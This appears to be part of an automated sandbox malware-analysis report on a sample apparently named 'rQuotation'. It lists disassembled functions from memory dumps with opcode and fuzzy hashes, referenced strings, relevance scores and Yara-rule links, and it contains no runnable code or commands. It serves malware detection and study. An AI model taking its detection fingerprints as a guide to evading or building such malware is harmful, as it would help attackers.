                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@
                                                                                                                                                                                                                                                • API String ID: 0-149943524
                                                                                                                                                                                                                                                • Opcode ID: d5263350759137dcc174d2ea0bf25929428d28486d7ea0987de6cd94025c2e7f
                                                                                                                                                                                                                                                • Instruction ID: 0028cec90cc062e1cea19a5fd23f8835cc7cc9bb577dba253ab23b5c55e0e05a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5263350759137dcc174d2ea0bf25929428d28486d7ea0987de6cd94025c2e7f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 703290709083618BD724CF19C884B3EBBF1EF88744F15491EFA969B6A0E734D885CB52
                                                                                                                                                                                                                                                Function 016CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrResSearchResource Enter, xrefs: 016CAA13
                                                                                                                                                                                                                                                • LdrResSearchResource Exit, xrefs: 016CAA25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                                                                                                                                • Opcode ID: 18be4486133f4dc93754f10ec29db1cbb96ca5b6eb8757a83c226e323cae19c3
                                                                                                                                                                                                                                                • Instruction ID: 98dbec2e9577f5f303d54602e297b35d96d1faaa9295e5c2b5661a45619d2b03
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18be4486133f4dc93754f10ec29db1cbb96ca5b6eb8757a83c226e323cae19c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13E14171E006199BEB228EDDCD44BBEBBBAFF08714F14452AE901E7251E778D942CB50
                                                                                                                                                                                                                                                Function 0178A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: `$`
                                                                                                                                                                                                                                                • API String ID: 0-197956300
                                                                                                                                                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                                • Instruction ID: d26b28ecca8d665d2dbd9febc9e50c13d2fb5919458b4d596b283b476f6deb08
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC1E1312443429BEB25EF28C844B2BFBE5AFC4318F184A2EF696CB294D774D545CB51
                                                                                                                                                                                                                                                Function 016C0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • ResIdCount less than 2., xrefs: 0171EEC9
                                                                                                                                                                                                                                                • Failed to retrieve service checksum., xrefs: 0171EE56
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                                                                                                                • API String ID: 0-863616075
                                                                                                                                                                                                                                                • Opcode ID: 79eda36cf00d8669206ee625e013d151b4c840786570b0c1db2b95b5206e56e9
                                                                                                                                                                                                                                                • Instruction ID: 54b7c83224885d0b140f3a5c19dd045e1c9c87928382c4f139cf09b934049e0a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79eda36cf00d8669206ee625e013d151b4c840786570b0c1db2b95b5206e56e9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35E1E2B19087449FE325CF19C480BABFBE4FB88714F40892EE5998B381DB719949CF56
                                                                                                                                                                                                                                                Function 0173E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                                • Opcode ID: be77e48e1c2617a886bb3fed2c5bcc9225b14d4da01b14a7e947337847cfc0bb
                                                                                                                                                                                                                                                • Instruction ID: f9f12b1974fe0eeaf3f9e61c1f02e9ee567bf6100a7fe6a388067b60ee5d3c1c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be77e48e1c2617a886bb3fed2c5bcc9225b14d4da01b14a7e947337847cfc0bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF614C72E403199FDB15DFA8C940BAEFBB5FB88700F14446DE649EB292DB31A940CB50
                                                                                                                                                                                                                                                Function 017643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$MUI
                                                                                                                                                                                                                                                • API String ID: 0-17815947
                                                                                                                                                                                                                                                • Opcode ID: 97042b93ac32f211cca2b79295dfc5cb147ec7abb89b8b3c6a13c908badc3910
                                                                                                                                                                                                                                                • Instruction ID: 9129f17e04d5cd4aff448ad473d1370d61120dc18a545f07cd098ed36baa6424
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97042b93ac32f211cca2b79295dfc5cb147ec7abb89b8b3c6a13c908badc3910
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 855107B1E0021DAEDB11DFA9CC84EEEFBBDEB44754F100529EA11B7291D6349E45CB60
                                                                                                                                                                                                                                                Function 016C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • kLsE, xrefs: 016C0540
                                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 016C063D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                                                                                                                                • Opcode ID: 519fc09d3df8f7ff0dee5c59117178722497bc02272bb1c1d71c648869fca009
                                                                                                                                                                                                                                                • Instruction ID: 665fb2de329f6cf0a1e932ace85c32d8f65b0f8fb03a60e95c5b398ab3db279b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 519fc09d3df8f7ff0dee5c59117178722497bc02272bb1c1d71c648869fca009
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB51AC79500742CBD724EF29C9446B3BBE8EF84B04F10893EE69A87241E7309545CF92
                                                                                                                                                                                                                                                Function 016CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 016CA309
                                                                                                                                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 016CA2FB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                                                                                                                                • Opcode ID: f1f4eaf34ba3366354ce724d736c87c2b65d8d288b7ffa01bd07ddc50387a1b1
                                                                                                                                                                                                                                                • Instruction ID: 76667c2f4850ef47e59ffdbb9f49a1e7fe3426cdc645a2e15c5ea4242234bc13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1f4eaf34ba3366354ce724d736c87c2b65d8d288b7ffa01bd07ddc50387a1b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A641B071A04659DBDB21CFA9C854B7ABBB5FF84B00F2440A9E908DB392F3B5D901CB50
                                                                                                                                                                                                                                                Function 016FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                                • Opcode ID: edaa0746143f712d7df4d65f528a5de7e04d007a9c3151a601677be786936b5a
                                                                                                                                                                                                                                                • Instruction ID: 9668c8f00c7bdd10b1188f4ee55e7749a247191eb4a9e8febb444765048307f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edaa0746143f712d7df4d65f528a5de7e04d007a9c3151a601677be786936b5a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D501ADB2250740AFE312DF64CD49F1677E8E784729F00893EA64DC7190E334D804CB46
                                                                                                                                                                                                                                                Function 016CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: MUI
                                                                                                                                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                                                                                                                                • Opcode ID: 1566c64608a829eeac977b1957cfa6c8e986dfdc69441395f84ff400b563c30c
                                                                                                                                                                                                                                                • Instruction ID: e991967e87f088d70f2c946260e717aff8e140d0f57756c0b7b815daa56ad8cc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1566c64608a829eeac977b1957cfa6c8e986dfdc69441395f84ff400b563c30c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E824975E002598BEB25CFA9C884BFDBBB5FF48B10F14816ED919AB351D7309942CB90
                                                                                                                                                                                                                                                Function 01712F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: P`vRbv
                                                                                                                                                                                                                                                • API String ID: 0-2392986850
                                                                                                                                                                                                                                                • Opcode ID: c02509269a81bf92b6cb4b1efa261ebe7242b380c888331442b85d8654d89a0c
                                                                                                                                                                                                                                                • Instruction ID: a223d2f6311c089cae273d949128182d61fdd78dc2442148a8da2be643ef5db4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c02509269a81bf92b6cb4b1efa261ebe7242b380c888331442b85d8654d89a0c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A42E471D0425AAEEF29DFACD8486FDFBB1BF05330F24805AE545AB289D7748A81C750
                                                                                                                                                                                                                                                Function 0176CD1F Relevance: 1.9, Strings: 1, Instructions: 620COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                • Opcode ID: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                                                                                                                                                                                                • Instruction ID: d12b4bb310eb245c3efd0f4b7a32d97d4a1a2d6caf7c8f14487cd61c2bc09e18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a62076708d3ed8f09253c3cd3ba277d89f510b56d554c4357fdc89bf54a91837
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F621770D012188FCB98DF9AC4D4AADB7B2FF8C311F648199E9816BB45C7356A16CB60
                                                                                                                                                                                                                                                Function 016E2E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                • Opcode ID: ad89f76f8f04b1d97a01a6a107f635fa04c099633c8f2553c8e119a201d9d31e
                                                                                                                                                                                                                                                • Instruction ID: 3bf7a405c0cf2f572e8513b38c072f712856ef6ade18bfbb51aff6a27792d9bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad89f76f8f04b1d97a01a6a107f635fa04c099633c8f2553c8e119a201d9d31e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFF1B57160A342CFD726CF28C898B6ABBE1BFC8710F044A6DE99987741DB34D945CB52
                                                                                                                                                                                                                                                Function 00856D23 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                • API String ID: 0-3887548279
                                                                                                                                                                                                                                                • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                • Instruction ID: 2e7f24c59357463273d435099a133053a963b2f596b8f9c80382c9ad10cb59e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                                                                                                                                                Function 016C2FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: PATH
                                                                                                                                                                                                                                                • API String ID: 0-1036084923
                                                                                                                                                                                                                                                • Opcode ID: ceaab754e04beef612ef813f60b9fd46ac128571079c85883259bbfdfc5e1919
                                                                                                                                                                                                                                                • Instruction ID: 25897706d25cb96d52c5a58080ef2eb227508e83f4cf43194f66ee2df6b190a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ceaab754e04beef612ef813f60b9fd46ac128571079c85883259bbfdfc5e1919
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF18971E10219DBDB25DF99DC80ABEBBB1FF88B10F54802DE945AB344D7349941CBA1
                                                                                                                                                                                                                                                Function 0174EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aullrem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3758378126-0
                                                                                                                                                                                                                                                • Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                                                                                                                                                                                                • Instruction ID: b65b83502ae5375db7d8d0fbe25bf66638a494b2baa112aecd6bb244be30924d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62416D71F001199BDF18DFBDC8805AEF7F2FF88324B18867AD625E7295D634A9518780
                                                                                                                                                                                                                                                Function 016C0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 5523d840f092b3d8dd7ba4f51dd41e8b2a11e3767b02447fa5c11cb806e8ca6b
                                                                                                                                                                                                                                                • Instruction ID: 83614e2a8b2f7dcb72c4f4fd9a11306f2488133d1162ef7b856f802761705534
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5523d840f092b3d8dd7ba4f51dd41e8b2a11e3767b02447fa5c11cb806e8ca6b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75A15F35A04269E7DF36CA688C44FFEABA6DF54B04F04809DFE8A572C1CB74C9818754
                                                                                                                                                                                                                                                Function 01774420 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: dd9ae553585b1d9c25a201b3152a398532d822e9adab8e9cb16919d3298b9355
                                                                                                                                                                                                                                                • Instruction ID: 7abc83777f5ed7093b9c99a7b03ed031540e10b0a13030193035cfa00608af79
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd9ae553585b1d9c25a201b3152a398532d822e9adab8e9cb16919d3298b9355
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EA13735600368AADF35CA28CC44BFAEBA59F5A714F18449CEE479B2C1D775C980CBA4
                                                                                                                                                                                                                                                Function 01746420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 214216bbcdd23203961f3c2bd74edf4f60e6274ba97a6971eabcb643a92182a4
                                                                                                                                                                                                                                                • Instruction ID: 37e907340f2f7586db163328646805f4ba6ab634a6aaea16894cf7f5ecc043bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 214216bbcdd23203961f3c2bd74edf4f60e6274ba97a6971eabcb643a92182a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B91A5B2941219AFEB21DF95CC85FAEBBB9EF45750F100159F600AB291D774ED00CBA4
                                                                                                                                                                                                                                                Function 0176E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                                                                • Opcode ID: 9728025b2d88351e059183a312b68e55561d9e39a890671824cfadcf09080edf
                                                                                                                                                                                                                                                • Instruction ID: 5bec7951cdc62123a117ce3ff85241910405a1f52ff96863f444f51b07f50b25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9728025b2d88351e059183a312b68e55561d9e39a890671824cfadcf09080edf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2919F75901609EEDB22EBA5DC44FAFFBBEEF45740F100029FA05A7250EB749905CBA1
                                                                                                                                                                                                                                                Function 016FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: GlobalTags
                                                                                                                                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                                                                                                                                • Opcode ID: b590ee4ff7ad4ab7aab1ee7d67c7d364fc557bf48e032795f515497e610d61d1
                                                                                                                                                                                                                                                • Instruction ID: 36c526006400f70b007012e5767c87e00cf3862378bf44d62776e0ee6c487820
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b590ee4ff7ad4ab7aab1ee7d67c7d364fc557bf48e032795f515497e610d61d1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D718EB5E0021AAFDF29CF9CC5906EDFBB2BF88710F14816EE505A7246E7319A41CB54
                                                                                                                                                                                                                                                Function 01764978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .mui
                                                                                                                                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                                                                                                                                • Opcode ID: cfaecd7c2319b51cad527849315e97fd1b3f9aaba983860c78e29d4c781e18a4
                                                                                                                                                                                                                                                • Instruction ID: d2f9fcb5f900cd951dcc963986b41ce3b335c3d0edda98415f7087c7c05132c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfaecd7c2319b51cad527849315e97fd1b3f9aaba983860c78e29d4c781e18a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E551A772D002269BDF15DF99D844AAEFBB9EF04A14F05416DED16B7240D3349D01CBE4
                                                                                                                                                                                                                                                Function 016DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
